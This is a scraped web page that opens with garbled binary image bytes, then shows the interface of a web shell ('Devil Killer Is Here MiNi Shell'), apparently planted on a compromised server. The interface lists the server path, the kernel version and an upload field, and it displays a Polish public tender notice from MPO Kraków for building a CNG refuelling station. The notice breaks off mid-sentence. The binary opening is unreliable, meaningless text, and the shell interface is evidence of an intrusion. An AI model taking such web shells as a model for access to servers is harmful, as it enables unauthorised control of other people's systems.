JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220512/0015628101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i wykonanie stacji tankowania gazu CNG na terenie bazy MPO w Krakowie przy ulicy Nowohuckiej 1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejskie Przedsiębiorstwo Oczyszczania Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350641392</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowohucka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-580</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 12 64 62 202</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 12 64 62 350</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">beata.wolnik@mpo.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mpo.krakow.pl/pl/main</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i wykonanie stacji tankowania gazu CNG na terenie bazy MPO w Krakowie przy ulicy Nowohuckiej 1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4f7fa366-d126-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00156281</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mpo-krakow.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mpo krakow.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)	Zamawiający informuje, iż komunikacja w niniejszym postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej tj. Platformy Przetargowej pzp24.pl dostępnej pod adresem: https://mpo-krakow.logintrade.net. Szczegółowe informacje w zakresie wymagań sprzętowych dla ww. Platformy Przetargowej znajdują się pod link: <br/>https://mpo-krakow.logintrade.net/reg,info,wymaganiatechniczne.html.<br/>b)	Komunikacja ustna dopuszczalna jest w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, potwierdzenia zainteresowania, ofert.<br/>c)	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania. <br/>d)	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o których mowa w pkt. 10 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym za pomocą platformy, o której mowa w lit. a). <br/>e)	Dokumenty inne niż wskazane w lit. d) tj. zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>- drogą elektroniczną: beata.wolnik@mpo.krakow.pl lub<br/>- poprzez Platformę, dostępną pod adresem: https://mpo-krakow.logintrade.net.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>a)	administratorem Pani/Pana danych osobowych jest Miejskie Przedsiębiorstwo Oczyszczania Sp. z o.o., ul. Nowohucka 1, 31-580 Kraków, tel. +48 12 64 62 202, e-mail: mpo@mpo.krakow.pl.<br/>b)	Osobą kontaktową we wszelkich sprawach dotyczących ochrony danych osobowych w Miejskim Przedsiębiorstwie Oczyszczania Sp. z o.o. jest Inspektor Ochrony Danych dostępny pod adresem: iod@mpo.krakow.pl;<br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Wykonanie i dostawę fabrycznie nowych pojemników plastikowych na odpady dla Miejskiego Przedsiębiorstwa Oczyszczania Sp. z o. o. w Krakowie” nr sprawy: TZ/EG/4/2022, prowadzonym w trybie podstawowym;<br/>d)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 97 ustawy Pzp;<br/>e)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>g)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h)	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i)	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>**Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TZ/TT/3/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zaprojektowanie i wykonanie stacji tankowania gazu CNG na terenie<br/>bazy MPO w Krakowie przy ulicy Nowohuckiej 1.<br/>Szczegółowy opis przedmiotu zamówienia zawiera zał. nr 1 do SWZ tj. Program Funkcjonalno –<br/>Użytkowy sporządzony przez firmę Collect Consulting S.A. ul. Zbożowa 42 B/315, 40-657 Katowice.<br/>2. Minimalny wymagany okres gwarancji na przedmiot niniejszego zamówienia (na wykonane roboty<br/>budowlane, prace montażowe oraz dostarczone i zamontowane maszyny i urządzenia) –<br/>min. 24 miesiące (licząc od daty podpisania bez zastrzeżeń protokołu odbioru końcowego).<br/>3. Miejskie Przedsiębiorstwo Oczyszczania Sp. z o.o.,<br/>ul. Nowohucka 1,<br/>31–580 Kraków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie odpowiadać wszystkim<br/>wymaganiom zawartym w ustawie Pzp, SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryterium:<br/>Kryterium:<br/>Cena ( C ) - 95 %;<br/>Wydłużenie okres udzielonej gwarancji jakości (W) ponad minimalny wymagany przez Zamawiającego<br/>- 5 %.<br/>* Ilość punktów w kryterium cena ( C ) zostanie obliczona według następującego wzoru:<br/>C = (Ca / Cb)* 0,95 * 100 pkt.<br/>gdzie:<br/>C – ilość punktów badanej oferty w kryterium cena<br/>Ca - najniższa cena ze wszystkich ofert niepodlegających odrzuceniu<br/>Cb - cena badanej oferty niepodlegających odrzuceniu<br/>* Ilość punktow w kryterium wydłużenie okres udzielonej gwarancji jakości (W) zostanie<br/>przyznana w następujący sposób:<br/>Wykonawca który:<br/>- zaoferuje udzielnie gwarancji jakości na okres minimalny wskazany w SWZ czyli 24<br/>miesięcy (licząc od daty podpisania bez zastrzeżeń protokołu odbioru końcowego)<br/>otrzyma 0,00 punktów w tym kryterium;<br/>- zaoferuje udzielnie gwarancji jakości na okres 36 miesięcy i dłużej (licząc od daty<br/>podpisania bez zastrzeżeń protokołu odbioru końcowego) otrzyma 5,00 punktów w tym<br/>kryterium ( tj. 24 miesięcy jako minimalny wymagany okres gwarancji oraz 12 miesięcy<br/>jako dodatkowo udzielony okres gwarancji co daje łącznie 36 miesięcy udzielonej przez<br/>Wykonawcę gwarancji jakości (licząc od daty podpisania bez zastrzeżeń protokołu<br/>odbioru końcowego).<br/>Zamawiający informuje, iż powyższe kryterium oceny ofert dotyczy gwarancji jakości na wykonane<br/>roboty budowlane, prace montażowe oraz dostarczone i zamontowane maszyny i urządzenia.<br/>Łączna ilość punktów którą otrzyma dana oferta wynosić będzie:<br/>P = C + W<br/>gdzie:<br/>P – łączna ilość punktów która otrzyma dana oferta;<br/>C – ilośc punktów, którą otrzyma badana oferta w kryterium cena ( C );<br/>W - ilośc punktów, którą otrzyma badana oferta w kryterium wydłużenie okresu udzielonej gwarancji jakości (W)<br/>Wykonawca, który zaproponuje najniższą cenę brutto za realizację przedmiotu zamówienia oraz<br/>najdłuższy okres gwarancji spośród ważnych ofert spełniających wymagania, otrzyma najwięcej<br/>punktów, natomiast pozostali Wykonawcy – odpowiednio mniej punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny brutto lub kosztu i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okres udzielonej gwarancji jakości (W) ponad minimalny wymagany przez Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym - Zamawiający nie precyzuje szczególnych<br/>warunków uczestnictwa w tym zakresie;<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów - Zamawiający nie precyzuje szczególnych warunków uczestnictwa w tym<br/>zakresie;<br/>c) sytuacji ekonomicznej lub finansowej jednakże Zamawiający nie precyzuje szczególnych<br/>warunków uczestnictwa w tym zakresie;<br/>d) zdolności technicznej lub zawodowej przez co Zamawiający rozumie:<br/>- wykonanie przez Wykonawcę w okresie nie wcześniej niż w ostatnich pięciu latach, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwóch zamówień<br/>obejmujących zaprojektowanie oraz wykonanie stacji tankowania CNG o wartości nie<br/>mniejszej niż 1 500 000 zł brutto (każde z zamówień).<br/>- skierowanie do realizacji przedmiotu zamówienia projektanta instalacji posiadającego<br/>uprawnienia budowlane (bez ograniczeń) do projektowania w specjalności instalacyjnej w<br/>zakresie sieci gazowych, który wykonał dokumentacje projektowe co najmniej dwóch stacji tankowania CNG, w oparciu o które zrealizowano te inwestycje i dopuszczono je do<br/>użytkowania.<br/>- skierowanie do realizacji przedmiotu zamówienia osoby, która pełnić będzie funkcję<br/>kierownika montażu instalacji posiadającego uprawnienia budowlane do kierowania robotami<br/>budowanymi (bez ograniczeń) w specjalności instalacyjnej w zakresie sieci gazowych,<br/>posiadającego doświadczenie w zakresie kierowania robotami na co najmniej dwóch stacjach tankowania CNG.<br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania,<br/>uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę<br/>sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych<br/>Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na<br/>realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Do oferty Wykonawca zobowiązany jest dołączyć:<br/>- aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z<br/>postępowania – zgodnie z zał. nr 2 a) oraz zał. 2 b) do SWZ.<br/>b) Informacje zawarte w oświadczeniach, o których mowa w lit. a) stanowią wstępne potwierdzenie,<br/>że Wykonawca nie podlega wykluczeniu z<br/>postępowania.<br/>c) Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>d) Podmiotowe środki dowodowe wymagane od Wykonawcy na potwierdzenie niepodlegania<br/>wykluczenia z postępowania obejmują:<br/>wykluczenia z postępowania obejmują:<br/>- informacji z Krajowego Rejestru Karnego w zakresie:<br/>* art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>* art. 108 ust. 1 pkt 4 ustawy PZP, dotyczącej orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka karnego,<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>- Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności<br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył<br/>odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz<br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej – zał. nr 2 g) do SWZ;<br/>- Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że<br/>Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1<br/>ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda<br/>złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu<br/>składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz<br/>z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>-Zaświadczenie albo innego dokumentu właściwej terenowej jednostki organizacyjnej<br/>Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej<br/>placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że<br/>Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w<br/>zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed<br/>jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda<br/>złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu<br/>składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;<br/>- Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>Uwaga!!!<br/>Ciąg dalszy wykazu podmiotowych środków dowodowych na potwierdzenie niepodlegania 